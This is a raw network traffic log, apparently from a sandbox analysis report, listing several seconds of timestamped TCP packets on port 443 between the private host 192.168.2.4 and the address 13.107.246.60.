                                                Oct 30, 2024 00:22:52.188158035 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.188163996 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.189843893 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.190118074 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.190151930 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.190454960 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.190460920 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.191097021 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.191337109 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.191345930 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.191634893 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.191641092 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.314538002 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.314724922 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.314793110 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.314909935 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.314917088 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.314927101 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.314930916 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.318178892 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.318221092 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.318310022 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.318484068 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.318495989 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.318912983 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.319577932 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.319643974 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.319691896 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.319740057 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.319772959 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.319787979 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.321293116 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.321367979 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.321429968 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.321518898 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.321536064 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.321563005 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.321573019 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.321954012 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.322052002 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.322129965 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.322246075 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.322292089 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.323293924 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.323321104 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.323385954 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.323518038 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.323532104 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.652075052 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.652709007 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.652740955 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.653126001 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.653224945 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.653234959 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.653423071 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.653486013 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.653758049 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.653770924 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.783730984 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.783819914 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.783901930 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784132957 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784149885 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.784167051 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784173012 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.784586906 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.784802914 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.784878016 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784943104 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784943104 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.784982920 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.785008907 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.787631035 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.787688971 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.787719011 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.787746906 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.787821054 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.787826061 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.787965059 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.787982941 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.787985086 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.788007975 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.053684950 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.054369926 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.054395914 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.054860115 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.054867029 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.073255062 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.073662996 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.073676109 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.074055910 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.074063063 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.081583023 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.081876993 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.081906080 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.082200050 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.082211971 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357695103 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357736111 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357784986 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357796907 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357811928 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357867002 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.357917070 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.357969046 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.357999086 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358196020 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358196020 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358217955 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.358231068 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.358239889 CET58091443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358239889 CET58089443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358246088 CET4435809113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.358252048 CET4435808913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.358841896 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358875990 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.358916044 CET58090443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.358933926 CET4435809013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.361742020 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.361782074 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.361846924 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.361991882 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362035036 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.362088919 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362149000 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362178087 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.362179995 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362194061 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.362227917 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362286091 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362302065 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.362350941 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.362360954 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.543071032 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.544322968 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.544352055 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.548289061 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.548304081 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.549514055 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.549959898 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.549992085 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.550379038 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.550385952 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.678469896 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.679013968 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.679090023 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.679132938 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.679151058 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.679167032 CET58092443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.679181099 CET4435809213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.682292938 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.682354927 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.682452917 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.682588100 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.682619095 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.683008909 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.684129000 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.684185982 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.684231997 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.684231997 CET58093443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.684254885 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.684268951 CET4435809313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.686481953 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.686512947 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:53.686757088 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.686757088 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:53.686785936 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.103516102 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.104008913 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.104465008 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.104491949 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.104578018 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.104594946 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.105396986 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.105402946 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.105928898 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.105942011 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.108660936 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.109191895 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.109267950 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.110409975 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.110423088 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.239440918 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.239516020 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.239753008 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.239953995 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.240005016 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.240039110 CET58094443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.240057945 CET4435809413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.240597010 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.240835905 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.240937948 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.241456032 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.241456032 CET58095443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.241494894 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.241508007 CET4435809513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.243999958 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.244061947 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.244148970 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.249227047 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.249257088 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.249353886 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.249383926 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.249447107 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.249697924 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.249711037 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.293939114 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.294493914 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.294634104 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.294713974 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.294732094 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.294759035 CET58096443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.294768095 CET4435809613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.301316977 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.301363945 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.301507950 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.301882029 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.301908970 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.422822952 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.423984051 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.424024105 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.425348043 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.425360918 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.464049101 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.464523077 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.464534998 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.464917898 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.464922905 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.558067083 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.558363914 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.558485985 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.558868885 CET58097443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.558902025 CET4435809713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.565767050 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.565810919 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.565977097 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.566392899 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.566407919 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.605998993 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.606825113 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.606885910 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.609694004 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.609711885 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.609729052 CET58098443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.609735012 CET4435809813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.614567041 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.614619017 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.614715099 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.614902973 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.614932060 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.976236105 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.976953030 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.976990938 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.977834940 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.977848053 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.986804008 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.987694025 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.987759113 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:54.988929033 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:54.988943100 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.081979036 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.083087921 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.083117962 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.083586931 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.083601952 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.104387999 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.105540991 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.105674982 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.105750084 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.105786085 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.105818987 CET58099443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.105834961 CET4435809913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.111308098 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.111413956 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.111557961 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.111911058 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.111947060 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.115093946 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.115418911 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.115515947 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.115618944 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.115658045 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.115698099 CET58100443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.115712881 CET4435810013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.120009899 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.120096922 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.120245934 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.120704889 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.120738029 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.218780041 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.218861103 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.219023943 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.219547987 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.219594955 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.219625950 CET58101443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.219641924 CET4435810113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.225208044 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.225297928 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.225434065 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.225907087 CET58106443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.225941896 CET4435810613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.311824083 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.312870026 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.312932014 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.313355923 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.313369036 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.351066113 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.352117062 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.352179050 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.352494001 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.352509022 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.443475008 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.443600893 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.443757057 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.444261074 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.444309950 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.444343090 CET58102443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.444358110 CET4435810213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.448710918 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.448815107 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.448935986 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.449140072 CET58107443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.449184895 CET4435810713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.480664968 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.480838060 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.480918884 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.480988979 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.481010914 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.481029987 CET58103443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.481038094 CET4435810313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.483756065 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.483787060 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.483874083 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.484092951 CET58108443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.484111071 CET4435810813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.846652985 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.847506046 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.847542048 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.848005056 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.848014116 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.859631062 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.860157967 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.860212088 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.860586882 CET58105443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.860603094 CET4435810513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.984529972 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.984582901 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.984699965 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.984946012 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.984967947 CET4435810413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:55.984977961 CET58104443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:55.984982967 CET4435810413.107.246.60192.168.2.4
